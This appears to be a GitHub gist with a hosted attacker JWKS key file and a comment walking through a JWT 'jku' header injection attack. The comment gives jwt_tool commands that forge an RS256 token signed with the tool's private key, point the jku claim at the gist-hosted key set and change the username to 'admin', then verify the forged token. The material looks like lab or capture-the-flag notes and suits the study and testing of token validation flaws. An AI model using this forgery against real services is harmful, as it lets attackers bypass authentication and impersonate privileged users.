Skip to content

Instantly share code, notes, and snippets.

@kawing-ho

kawing-ho/jwks.json

Last active July 25, 2021 12:36
Show Gist options
  • Save kawing-ho/8aae9797973b4401745e43296ce1b325 to your computer and use it in GitHub Desktop.
Save kawing-ho/8aae9797973b4401745e43296ce1b325 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
jwks.json
{"keys":[{"e":"AQAB","kid":"jwt_tool","kty":"RSA","n":"kAxsJGZwBGq2i6nOw1bCIrg7JfGQch4InP4FyFJFexEvc5LeiPB5jRk0YEanlnoNdKdsqMdg2hMGOUBKOCYycWdwd3pXUDB-qTV7v2qzO586QA3F4G912ieLfD_2jdl9PGAl7RwK9YemQTly-x4d3eC4Qh7MzdSWl3VrNQ-WFWbkYGg2oIzACLPTX_-Ko9zdzDT3WhD_Zpub5q1jpwRw72KnHdQmLNS5M-12-Yz1VEhylcGCOu6MO2bYKco233SyGu9-g2Wkr-zDut6RA4UEVfwd70x316c85xxd2f4WLun_wW01akWf051kePX7uZq9VoF5WoXK4CSF7ZqoARebiQ","use":"sig"}]}
@kawing-ho
Copy link
Author

kawing-ho commented Jul 25, 2021
edited
Loading

https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool#common-attacks

jwt_tool will automatically generate public/private key pairs as well as the corresponding JWKS file.

This file is hosted here which will the URL will then be passed into the jku header claim.

In the meantime, the forged token should

  • Be tampered to change payload
  • Be signed with RS256 with the jwttool_custom_private_RSA.pem file
  • Alternatively, you can point straight to an already hosted JWKS (as long as it matches the jwttool_custom_jwks.json file)
python3 jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9sb2NhbGhvc3QvLndlbGwta25vd24vandrcy5qc29uIiwia2lkIjoiNDJhMTg0YWEtODkzZC00MTQzLTlmOWEtNDg0YTgyMTIwN2ZiIn0.eyJ1c2VybmFtZSI6ImFkbW9uIiwiaWF0IjoxNjI3MjEwODI3LCJleHAiOjE2MjcyMzI0Mjd9.SEsjuMb53f9UqQaOdAIYGPyK2VylCWVuGduPoW_Y0eNOp9M4sHvaTiQzQ-WRpziEAjU-ZaS0J74MPsP9B_1PHqSqInE_Z4DiQ0UhbF8r1KzjROScxl6B3EsKoCmdlIUinc1lANrwKm53dD7aE_Z7d0Vszjfhs9xYd5MP1wk6miQFIevqwyWZr1VT7iqGAHuCCTPty5L0yddVe_2OKtbpyPe7HcIZiYHeX80HMos-sn4GAGjkACGX8Zq04fn7kwfWKEPnl5N72_1WctfXIIWGS6KQuk-bcaZ04SrYu0IXm-K_QqFCwLM8c2KnQrF7vfDIBo7QFafkTB-cIhi8zGN9TA" -X s -ju "https://gist.githubusercontent.com/kawing-ho/8aae9797973b4401745e43296ce1b325/raw/7f2fc53e6f89e8e0113aee390efe46fc43c43476/jwks.json" -T

In interactive mode, make sure to:

  • Update the jku
  • Update the kid
  • Update the payload (in this case username)

To verify:

python3 jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20va2F3aW5nLWhvLzhhYWU5Nzk3OTczYjQ0MDE3NDVlNDMyOTZjZTFiMzI1L3Jhdy83ZjJmYzUzZTZmODllOGUwMTEzYWVlMzkwZWZlNDZmYzQzYzQzNDc2L2p3a3MuanNvbiIsImtpZCI6Imp3dF90b29sIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjI3MjEwODI3LCJleHAiOjE2MjcyMzI0Mjd9.fkteMIOk0BgLjXSVfhVcz8YPF4M_8YVei8bkOwingpiDB4UXOlIxVRTtQO-YSGfvhMcnrikdoziORDUeEBldRRU3T5DJAcga9rMwO2FkD9m1-5Dkj2jYIOLjQODTvjQCwozlZxYd24vYhiEJ6GFZ4vBnsJa9lwx6VQzNx5a8lUBgq3DYoUBk9J6LepKeDIS33ohfWFboS5PZMtm0vqyNymOkFfNpf2yxQ1yYMc9MlAcrqPf3m5b150H4T1fLxytPaGME5HfYOsaKp5vgQSPYFJZY05Q5-pykkbkDhMoyBi1INi33xF4qqNdkbvdaKbHT--WXzcLqLIq69grLL4vReA" -V -jw "jwttool_custom_jwks.json"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment